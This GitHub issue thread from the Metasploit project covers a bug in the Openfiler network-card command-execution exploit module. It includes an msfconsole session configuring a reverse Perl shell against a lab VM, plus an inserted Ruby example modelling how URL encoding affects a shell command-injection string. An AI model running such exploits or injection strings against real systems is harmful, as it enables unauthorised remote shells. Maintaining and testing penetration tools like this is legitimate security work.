Commit "da0a9f66ea93307cf2985dab3f75cf5611932cc8" breaks module "exploit/linux/http/openfiler_networkcard_exec" #5103

Closed
jnesta opened this issue Apr 8, 2015 · 9 comments · Fixed by #5181

@jnesta

jnesta commented Apr 8, 2015

Hello team - this bug is for the openfiler Metasploit module. For reference, here is the official documentation page on the module and here is the Github page for it.

This commit by FireFart on May 25, 2014 appears to break the code.

To test, I am using a VM with Openfiler on it. The version is "Openfiler NSA (32-bit PAE)" (as reported in "/etc/distro-release").

In Metasploit, I load the payload "use exploit/linux/http/openfiler_networkcard_exec" and then use a payload of "cmd/unix/reverse_perl".

In my testing, versions of the code prior to this commit will work just fine and receive the remote shell. And versions of the code after this commit will fail. As someone who only has a passing familiarity with Metasploit module code, I'm not sure why this is.

Let me know if you need additional information, but I'm thinking this should be easy enough to reproduce. ;)

@wchen-r7
Contributor

wchen-r7 commented Apr 9, 2015

Is there a backtrace?

@firefart
Contributor

firefart commented Apr 9, 2015

@wchen-r7 maybe the cmd parameter is URL encoded by send_request_cgi and wasn't in the url parameter?

@wchen-r7
Contributor

wchen-r7 commented Apr 9, 2015

Yeah, that would be the only difference between the two commits. Need to actually download the vulnerable software and test to make sure.

@firefart
Contributor

firefart commented Apr 9, 2015

@wchen-r7 if that's the case, we should add the encode_params false parameter to all relevant changes from this commit

da0a9f6#diff-b612aa6abe8a5e3a476e47624acd3879L99

da0a9f6#diff-e26c2f019a718e3d7f48f7cebb0e38cbR57

da0a9f6#diff-d57f0cc27754363db4b9549ba907f31aR77
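The encoding difference discussed above, as an added example that is not part of the thread, of Metasploit, or of Openfiler: a hand-built URL carries the command string through untouched, while a client helper that percent-encodes query values (the behaviour the thread attributes to send_request_cgi, which `encode_params false` turns off) turns `;` into `%3B` and spaces into `+`. Whether that matters depends on the target: the two "sinks" below are constructed models, one that reads QUERY_STRING without decoding it and one that decodes properly; neither is Openfiler's real CGI code, and the command string is a constructed sample.

```ruby
require 'uri'

# Build the GET query either percent-encoded (what an HTTP client library
# normally does) or by plain concatenation (what a hand-built URL string does).
def build_query(params, encode: true)
  if encode
    URI.encode_www_form(params)
  else
    params.map { |k, v| "#{k}=#{v}" }.join('&')
  end
end

# Constructed model of a CGI script that pulls a parameter straight out of
# QUERY_STRING with no percent-decoding. An assumption for illustration only.
def naive_param(query, name)
  query.split('&').each do |pair|
    key, value = pair.split('=', 2)
    return value if key == name
  end
  nil
end

# Model of a CGI script that decodes the query properly.
def decoding_param(query, name)
  URI.decode_www_form(query).to_h[name]
end

# True when the command arrives at the sink byte-for-byte, i.e. its shell
# metacharacters were not left as %XX / + sequences (or lost entirely).
def payload_intact?(received, cmd)
  received == cmd
end

# Run one command through both query builders and both sinks.
def demo(cmd)
  raw_q = build_query({ 'cmd' => cmd }, encode: false)
  enc_q = build_query({ 'cmd' => cmd }, encode: true)
  {
    raw_query:             raw_q,
    encoded_query:         enc_q,
    naive_sink_raw:        payload_intact?(naive_param(raw_q, 'cmd'), cmd),
    naive_sink_encoded:    payload_intact?(naive_param(enc_q, 'cmd'), cmd),
    decoding_sink_raw:     payload_intact?(decoding_param(raw_q, 'cmd'), cmd),
    decoding_sink_encoded: payload_intact?(decoding_param(enc_q, 'cmd'), cmd)
  }
end

if $PROGRAM_NAME == __FILE__
  demo(';/bin/sh -c id;').each { |k, v| puts "#{k}: #{v}" }
end
```

Against the non-decoding sink only the raw query delivers the command intact, which matches the symptom in this issue (old hand-built URL works, encoded vars_get request fails silently); against the decoding sink both forms work, so turning encoding off is a per-target decision rather than something to apply to every module.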

@wchen-r7
Contributor

wchen-r7 commented Apr 9, 2015

Good to know, thanks!

@jnesta
Author

jnesta commented Apr 10, 2015

wchen-r7 - There is no backtrace. Here is a copy paste of what happens when it fails:

msf exploit(openfiler_networkcard_exec) > show options

Module options (exploit/linux/http/openfiler_networkcard_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  Th1si$sXuR3      yes       The password for the application
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     10.1.3.120       yes       The target address
   RPORT     446              yes       The target port
   SSL       true             yes       Use SSL
   USERNAME  openfiler        yes       The username for the application
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.16.19.3       yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(openfiler_networkcard_exec) > exploit

[*] Started reverse handler on 10.16.19.3:4444 
[*] 10.1.3.120:446 - Sending payload (229 bytes)
[+] 10.1.3.120:446 - Payload sent successfully
msf exploit(openfiler_networkcard_exec) > 

As you can see, the Metasploit prompt is returned with no shell (as opposed to coming back with no prompt at all, which is what the reverse Perl shell does).

@wchen-r7
Contributor

Ok I see. Thanks. Sounds like encoding is a possible root cause.

@wchen-r7 wchen-r7 added the bug label Apr 10, 2015
@wchen-r7 wchen-r7 self-assigned this Apr 14, 2015
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this issue Apr 17, 2015
Fix rapid7#5103. By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
@firefart
Contributor

@jnesta if you use the git version and update the master branch, the module should be working again

@jnesta
Author

jnesta commented Apr 19, 2015

Yes, the latest version of the code works again. Thanks guys!
